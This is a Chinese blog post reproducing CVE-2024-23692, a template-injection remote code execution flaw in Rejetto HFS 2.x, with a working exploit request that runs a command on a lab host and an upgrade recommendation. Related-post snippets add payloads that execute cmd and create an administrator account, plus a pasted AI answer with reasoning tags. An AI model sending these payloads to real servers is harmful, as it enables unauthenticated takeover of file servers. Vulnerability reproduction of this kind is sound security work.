HFS文件服务器RCE 漏洞复现(CVE-2024-23692)

原创 于 2024-11-26 15:02:09 发布 · 732 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维

HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
1.漏洞描述
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692

影响版本

HFS 版本 2.4.0 RC7 和 2.3m

CVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。此模板包含来自请求的搜索查询参数的内容,该内容未正确转义,从而启用了 SSTI

在正常操作下,符号和宏会被编码以防止 SSTI。但是,通过强制服务器取消转义某些字符,攻击者可以将任意宏注入模板

2.漏洞复现
在此漏洞中,%url%符号未转义,允许 URL 的其余部分回显到服务器端内容中。通过操纵搜索查询参数,攻击者可以关闭默认模板标记并注入任意命令

GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: 192.168.2.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: HFS_SID_=nJhD39Qx5kAAAABHR7bhPw
Connection: close

在这里插入图片描述

Stephen Fewer 将此漏洞的可利用性评定为非常高,因为远程未经身份验证的攻击者可以利用此漏洞。但是,由于 HFS 通常不用作企业级 Web 服务器,因此攻击者的价值被认为很低。尽管如此,受影响系统受到损害的可能性仍然很大,尤其是对于依赖 HFS 进行个人或小型企业文件共享的用户而言。

安全研究员Arseniy Sharoglazov发现了该漏洞,Stephen Fewer 提供了 Metasploit 的详细分析和漏洞利用模块。有关详细的技术信息和Metasploit 模块,用户可以参考Stephen Fewer 在 AttackerKB 上发表的原始文章

参考:https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

3.漏洞修复
针对HFS版本2.x的补丁已经缺失,因为该版本的维护者不再支持。强烈建议用户升级到Rejetto HFS的版本3.x,以免受到这一漏洞的影响

wangxingps
关注
Rejetto HTTP文件服务器 未授权RCE漏洞复现(CVE-2024-23692)
0xSec
06-11 3239
Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
CVE-2024-23692: Rejetto HTTP File Server 2.3m Unauthenticated RCE漏洞复现
banliyaoguai的博客
07-11 1027
Rejetto是一个流行的开源软件项目,主要是一个轻量级的HTTP文件服务器软件。它最著名的应用是HFS(HTTP File Server),这是一个免费的Web服务器软件,专门用于共享和传输文件。HFS(HTTP File Server)允许用户通过浏览器访问和下载存储在计算机上的文件。它非常轻量级,易于安装和配置,适合个人用户或小型团队在局域网内共享文件。HFS具有简洁的界面和基本的文件管理功能,可以通过简单的设置实现文件夹的共享和访问控制。
HFS修复漏洞
09-20
HFS修复漏洞
Rejetto HFS 服务器存在严重漏洞受到攻击
网络研究观
07-07 1986
黑客正在针对旧版本的 Rejetto HTTP 文件服务器 (HFS) 注入恶意软件和加密货币挖矿程序。
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 6140
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 2678
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
hfs-windows-x64-0.53.1.zip
10-20
HFS-windows-x64-0.53.1.zip提供了一个简单但功能足够的解决方案,用于在Windows x64位系统上搭建HTTP文件服务器。它适合个人使用,也适合小型团队进行文件共享和测试工作,同时提供了一定的自定义和扩展空间,是...
SSRF利用HFS的远程命令执行漏洞RCE
qq_45884775的博客
04-09 5427
0x00SSRF漏洞介绍: SSRF漏洞服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。 0x01SSRF漏洞原理: SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。SSRF是利用存在缺陷的we
远程执行_HFS远程命令执行漏洞复现
weixin_42315338的博客
01-15 394
这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。漏洞程序下载地址见评论运行程序截图如下尝试访问该软件提供的web服务web服务是这个样子的,这个web服务的搜索处存在漏洞一、手工利用payload如下http://127.0.0.1/?...
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
【全功能专用】Http File Server (HFS) 专用HFS模板 最新修订版
08-13
在原版基础上进行优化,界面清爽优雅,格式整齐。可自由切换显示/隐藏左边功能区。1、新增“留言板”功能,支持QQ表情功能;2、新增服务器通讯状态;3、新增显示“注释”列,优化注释(鼠标焦点自动显示注释),避免影响界面美观;4、优化最新标志、分页、上传等功能,新增目录注释滚动提示;5、模板已抽取控制变量,在一定程度上可根据自己喜好设置页面格式,方便,便捷。系统不支持免积分下载,只能默认1积分下载(1积分非落入本人账户),敬请见谅!
HFS2.3稳定版
11-20
HFS,它是一种上传文件的软件。 专为个人用户所设计的 HTTP 档案系统 - Http File Server,如果您觉得架设 FTP Server 太麻烦,那么这个软件可以提供您更方便的档案传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者,直接将欲加入的档案拖曳至此窗口,便可架设完成个人 HTTP 虚拟档案服务器
漏洞利用-(HFS-RCE远程命令执行)
my的博客
07-04 2196
概念验证是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5970
最近爆出了HFS(Http File Server)爆出了这个漏洞
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6804
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
HFS的远程命令执行漏洞RCE
weixin_30527323的博客
03-20 3547
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2、HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3、漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
安全开发-HFS漏洞利用脚本编写
niqiu320的博客
05-12 1250
0x01 安全开发-HFS漏洞利用脚本编写 下载并在虚拟机2008里面(因为主机防火墙缘故)开启HFS~网络文件服务器 2.3Beta 一、攻击准备 复制HFS的IP在浏览器中,并且在IP后添加用户exp /?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20TechSupport%20admin.12345%20/add%20%26%20net%20localgroup%20administrators%20admin.12345%20/add.%7D
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 2314
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
hfs 漏洞
最新发布
03-14
<think>好的,我现在需要处理用户关于HFS文件系统漏洞的查询。首先,用户提到了CVE-2024-23692这个漏洞,并引用了四个相关的资料。我需要先理解这些资料的内容,然后整理出用户需要的信息。 首先,根据引用[1],Rejetto HTTP File Server存在远程代码执行漏洞,攻击者可以通过构造特殊请求执行系统命令。网络空间测绘使用Fofa搜索app="HFS"可以找到相关实例。这里的关键点是漏洞的类型是远程代码执行,影响的是HFS应用,而不是HFS文件系统,可能用户有些混淆。 接着,引用[2]详细描述了CVE-2024-23692,指出影响版本是HFS 2.x,漏洞复现的步骤包括访问环境、构造POC等,并提到维护者不再支持2.x版本,建议升级到3.x。这说明漏洞存在于Rejetto HFS的2.x版本中,属于远程代码执行,需要用户升级到3.x。 引用[3]进一步确认了漏洞复现的情况,强调2.x版本缺乏补丁,建议升级到3.x。而引用[4]则提供了官方修复链接,建议用户尽快升级。 用户的问题是关于HFS文件系统的安全漏洞,但根据引用内容,Rejetto HFS实际上是一个HTTP文件服务器软件,并非文件系统如HFS+(Hierarchical File System)。这里可能存在误解,需要澄清。不过,根据提供的引用,用户可能混淆了HFS(HTTP File Server)和HFS+文件系统,但根据上下文,漏洞确实存在于Rejetto的HFS软件中。 接下来,我需要将漏洞详情和修复方法整理出来。需要确保信息准确,并正确引用提供的资料。同时,用户可能关心漏洞的影响、如何检测、如何修复,以及是否有公开的POC。 需要注意的是,用户提供的引用中有三个不同的引用号,但内容可能重复,比如引用[2]、[3]、[4]都涉及CVE-2024-23692。需要将这些信息整合,避免重复,同时覆盖所有关键点:漏洞描述、影响版本、复现方法、修复建议。 然后,生成相关问题,需要围绕HFS漏洞,可能包括漏洞原理、检测方法、修复措施、其他相关漏洞等。 最后,确保回答符合系统级指令,正确使用中文,LaTeX格式正确,问题部分自然呈现。</think>关于Rejetto HFS文件服务器的远程代码执行漏洞CVE-2024-23692),以下是技术细节和修复方案: ### 漏洞详情 1. **漏洞类型** 远程代码执行(RCE),攻击者可构造特殊HTTP请求直接执行系统命令。该漏洞源于对用户输入过滤不严,导致恶意指令注入服务器环境[^1][^2]。 2. **影响版本** Rejetto HFS 2.x全系列版本。官方已停止维护2.x分支,因此无法提供补丁[^3]。 3. **攻击特征** 利用HTTP请求中的参数注入系统命令,例如通过`exec`参数执行任意指令: ```http GET /?search=%00{exec|cmd.exe /c whoami} HTTP/1.1 ``` 此类请求会触发命令执行,返回结果嵌入HTTP响应中[^2]。 4. **风险等级** CVSS评分9.8(临界),无需认证即可远程攻击。 ### 修复方案 1. **立即升级到3.x版本** 官方已在HFS 3.x版本中修复该漏洞,下载地址: $$ \text{https://www.rejetto.com/hfs/?f=dl} $$ 新版本重构了请求处理模块,增加输入验证和沙箱隔离[^4]。 2. **临时缓解措施** - 使用Web应用防火墙(WAF)拦截包含`exec`、`cmd.exe`等关键词的请求 - 限制服务器外网访问权限,仅允许可信IP访问 3. **漏洞检测方法** 通过网络空间搜索引擎定位暴露实例: ```bash fofa-query 'app="HFS" && version~"2."' ``` 返回结果中的IP需立即进行修复验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值